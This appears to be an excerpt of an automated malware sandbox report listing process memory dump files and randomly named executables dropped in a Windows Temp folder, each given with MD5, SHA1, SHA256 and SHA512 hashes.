memory/1908-304-0x000007FEECF30000-0x000007FEED91C000-memory.dmp

memory/2036-310-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/1936-312-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2036-315-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/1936-317-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/1936-316-0x0000000002CA0000-0x0000000002D20000-memory.dmp

memory/2036-314-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/1936-313-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/1936-311-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\MGSumxcpSx.exe

MD5 07a019680ddb018e31af5754664b022b
SHA1 84b3a70ce3952bb84b6fb1b95a6d48d548726344
SHA256 d04655956d4e76da0fb9ba22e903a29bb16a836083e73faab8de9b1bc54d5c58
SHA512 fd0cfef98f9883062e0dab7236574261797e8e9c47c87c388f52c20bf54192a0c62d08b8c11e22d367d93100c48dcb87abb1a4df7fc36b0ec7645f095287a3c4

C:\Users\Admin\AppData\Local\Temp\kPxex847I7.exe

MD5 09d004710e617e57d92d16e7029b23ba
SHA1 386dd985f2d8472f4c8d1e0d9c0eb85b62f4f3f0
SHA256 5a484a2241fe121e65f290a39a5c1971ef6dcd2c8a854cad2bd5d3317c31f5af
SHA512 bda9540b90ea784da828252572ce169b9916e0bd27720080a9488d2516f0f4df0dc0632adb57c30cb8f540668003eb8e5e4258c8c998ad169417be54e7d90994

memory/2040-321-0x000000013F130000-0x000000013F294000-memory.dmp

memory/1284-322-0x0000000001350000-0x0000000001364000-memory.dmp

memory/1472-331-0x000007FEECF30000-0x000007FEED91C000-memory.dmp

memory/596-334-0x00000000002D0000-0x00000000002D8000-memory.dmp

memory/2388-336-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

MD5 74c98f00d4bad8f5d16d690619bfb899
SHA1 7a420c776bdcc1f823eb7a9d2d1bfce53fbe95d9
SHA256 480f6b57d52aae1809268821ee61f8fba01470dd473b584016132dd027d60065
SHA512 7cd66bc7f7106c27b4e77c8b0eb207eeb25e37fed3efb5709a4a6168aa790d4b7e547495b2fd8445eb88bb50ab9e99048cbf4609abd2c378084da6320e44f112

memory/2800-364-0x000000006D8E0000-0x000000006DE8B000-memory.dmp

memory/1296-365-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

memory/2800-366-0x0000000002C90000-0x0000000002CD0000-memory.dmp

memory/2800-367-0x000000006D8E0000-0x000000006DE8B000-memory.dmp

memory/2800-368-0x0000000002C90000-0x0000000002CD0000-memory.dmp

memory/1296-369-0x0000000002CE0000-0x0000000002D60000-memory.dmp

memory/1296-370-0x0000000002CE0000-0x0000000002D60000-memory.dmp

memory/596-351-0x000007FEED920000-0x000007FEEE30C000-memory.dmp

memory/2388-347-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2388-342-0x0000000000400000-0x000000000040A000-memory.dmp

memory/1284-341-0x00000000011E0000-0x0000000001220000-memory.dmp

memory/2708-335-0x000007FEF5320000-0x000007FEF5CBD000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CMWYeIDpgd.exe

MD5 d0c32ff1da809dda5724a90a5dd80ff5
SHA1 18f52952e62edb4ef0d31fa3b1aecb8678ccde1a
SHA256 1a2e7d970dea301dc3480138506bf76dc01f82150ed8224a3f44136a777ce3a4
SHA512 714cc6a0838f4dbb768632b4697c69f721badf0ee8169277c85a9cbdceff0fa668355767c7c8790ee605566f2deeeb87d4a7415bd34a3b8fd151cb4b6a54d3cb

memory/2040-327-0x000000013F130000-0x000000013F294000-memory.dmp

memory/1284-323-0x00000000712D0000-0x00000000719BE000-memory.dmp

memory/2388-403-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2388-404-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2388-406-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2388-409-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2388-411-0x0000000000400000-0x000000000040A000-memory.dmp